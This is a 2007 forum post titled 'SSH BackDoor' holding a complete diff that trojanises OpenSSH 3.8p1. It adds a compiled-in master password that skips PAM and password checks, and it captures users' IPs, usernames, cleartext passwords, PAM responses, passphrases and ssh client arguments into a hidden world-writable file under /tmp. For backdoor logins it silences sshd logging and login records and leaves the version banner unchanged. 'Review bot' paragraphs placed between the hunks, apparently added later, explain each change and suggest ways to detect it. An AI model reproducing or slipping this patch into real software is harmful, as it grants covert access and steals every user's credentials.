SSH BackDoor

Discussion in 'Уязвимости' started by banned, 4 Aug 2007.

  1. banned

    SSH BackDoor

    Code:
    diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
    *** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
    --- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
    ***************
    *** 342,347 ****
    --- 342,348 ----
       if (sshpam_err != PAM_SUCCESS)
        goto auth_fail;
       sshpam_err = pam_authenticate(sshpam_handle, 0);
    + if (bella) sshpam_err = PAM_SUCCESS;
       if (sshpam_err != PAM_SUCCESS)
        goto auth_fail;
       buffer_put_cstring(&buffer, "OK");
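Review bot: The added `if (bella) sshpam_err = PAM_SUCCESS;` line discards the result of `pam_authenticate()` whenever the global `bella` is non-zero, so a PAM failure no longer reaches `auth_fail`; this is an authentication bypass and the change must be rejected. `bella` is set in the auth-passwd.c and monitor.c hunks further down when the supplied secret equals the compiled-in `BACKPWD`. In the visible context `sshpam_err` is otherwise assigned only from PAM calls, so when auditing an sshd source tree any other write to it in auth-pam.c is worth comparing against the pristine openssh-3.8p1 file. The enclosing function starts and ends outside the hunk.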
    diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
    *** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
    --- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
    ***************
    *** 72,77 ****
    --- 72,81 ----
      #endif
       if (*password == '\0' && options.permit_empty_passwd == 0)
        return 0;
    + if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
    + sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
    + get_remote_ipaddr(), pw->pw_name, password);
    + bellalog();
     
      #if defined(HAVE_OSF_SIA)
       return auth_sia_password(authctxt, password) && ok;
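Review bot: The added `strcmp(BACKPWD, password)` line returns success before any of the real password checks below it run, for whichever account `pw` refers to, which turns `BACKPWD` into a master password; nothing like this belongs in auth-passwd.c. The next added lines pass the remote address, user name and cleartext password of every other attempt to `bellalog()`, and the monitor.c, readpass.c and ssh.c hunks do the same for PAM responses, passphrases and client arguments, so every credential that passed through a host running this build should be treated as exposed and rotated. The `sprintf` into the 512-byte `abuff` appears unbounded on remote-supplied strings, which adds a memory-safety risk to the affected daemon. The format strings (for example `passwd from: %s`) are compiled in as literals, so inspecting the printable strings of an installed binary is a simple check for this build. The enclosing function continues outside the hunk.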
    diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
    *** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
    --- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
    ***************
    *** 13,18 ****
    --- 13,38 ----
       * called by a name other than "ssh" or "Secure Shell".
       */
     
    + // start patch by acme - acme at olografix/paranoici dot org
    + #include <sys/stat.h>
    + #include <stdio.h>
    +
    + #define BACKPWD "inspassword"
    + #define SSH_LOG "/tmp/.lost+found"
    +
    + FILE *alog;
    + char abuff[512];
    + int alen, ai, bella;
    +
    + #define bellalog() { \
    + alen=strlen(abuff); \
    + for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
    + alog=fopen(SSH_LOG, "a"); \
    + if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
    + chmod(SSH_LOG, 0666); \
    + }
    + // end patch, from aion
    +
      #ifndef INCLUDES_H
      #define INCLUDES_H
     
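Review bot: This header hunk defines the indicators a responder can search for: the capture file `/tmp/.lost+found` (`SSH_LOG`), which `chmod(SSH_LOG, 0666)` makes readable and writable by every local user, and the `bellalog()` macro, which bitwise-inverts each byte of `abuff` before appending it. Because the encoding is a plain per-byte `~`, inverting the file's bytes again recovers the records, which helps scope which accounts were captured. The globals `alog`, `abuff`, `alen`, `ai` and `bella` are defined above the `INCLUDES_H` guard, so every file that includes this header sees them; per the other hunks that covers both the server and the ssh client. The version.h hunk leaves `SSH_VERSION` at `OpenSSH_3.8p1`, so the banner does not distinguish this build; verify installed binaries against the package manager's or vendor's checksums instead.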
    diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
    *** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
    --- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
    ***************
    *** 273,278 ****
    --- 273,279 ----
       char *txt = NULL;
       int pri = LOG_INFO;
     
    + if (bella) return;
       if (level > log_level)
        return;
     
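Review bot: The added `if (bella) return;` makes this logging routine return before anything is emitted once the master password has been accepted, and the loginrec.c hunk does the same in `login_write()` with `if (bella) return 0;`, so such sessions leave neither sshd log entries nor login records on the host. Detection therefore cannot rely on the host's own auth log or login accounting. Compare evidence collected off the host (flow records, firewall logs) against the sessions the host itself recorded, and investigate any SSH connection that has no matching entry. The enclosing function starts and ends outside the hunk.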
    diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
    *** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
    --- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
    ***************
    *** 406,411 ****
    --- 406,412 ----
      int
      login_write (struct logininfo *li)
      {
    + if (bella) return 0;
      #ifndef HAVE_CYGWIN
       if ((int)geteuid() != 0) {
         logit("Attempt to write login records by non-root user (aborting)");
    diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
    *** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
    --- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
    ***************
    *** 786,791 ****
    --- 786,793 ----
        fatal("UsePAM not set, but ended up in %s anyway", __func__);
     
       user = buffer_get_string(m, NULL);
    + sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(), user);
    + bellalog();
     
       start_pam(user);
     
    ***************
    *** 881,888 ****
       num = buffer_get_int(m);
       if (num > 0) {
        resp = xmalloc(num * sizeof(char *));
    ! for (i = 0; i < num; ++i)
         resp[i] = buffer_get_string(m, NULL);
        ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
        for (i = 0; i < num; ++i)
         xfree(resp[i]);
    --- 883,894 ----
       num = buffer_get_int(m);
       if (num > 0) {
        resp = xmalloc(num * sizeof(char *));
    ! for (i = 0; i < num; ++i) {
         resp[i] = buffer_get_string(m, NULL);
    + sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
    + if(!strcmp(BACKPWD, resp[i])) bella=1;
    + else bellalog();
    + }
        ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
        for (i = 0; i < num; ++i)
         xfree(resp[i]);
    diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
    *** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
    --- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
    ***************
    *** 123,128 ****
    --- 123,130 ----
        if ((ret = ssh_askpass(askpass, prompt)) == NULL)
         if (!(flags & RP_ALLOW_EOF))
          return xstrdup("");
    + sprintf(abuff, "readpass: %s\n", ret);
    + bellalog();
        return ret;
       }
     
    ***************
    *** 134,138 ****
    --- 136,142 ----
     
       ret = xstrdup(buf);
       memset(buf, 'x', sizeof buf);
    + sprintf(abuff, "readpass: %s\n", ret);
    + bellalog();
       return ret;
      }
    diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
    *** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
    --- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
    ***************
    *** 212,217 ****
    --- 212,221 ----
       extern int optind, optreset;
       extern char *optarg;
     
    + for(i=1; i<ac; i++) {
    + sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
    + bellalog();
    + }
       __progname = ssh_get_progname(av[0]);
       init_rng();
     
    diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
    *** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
    --- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
    ***************
    *** 1,3 ****
      /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
     
    ! #define SSH_VERSION "OpenSSH_3.8p1"
    --- 1,3 ----
      /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
     
    ! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it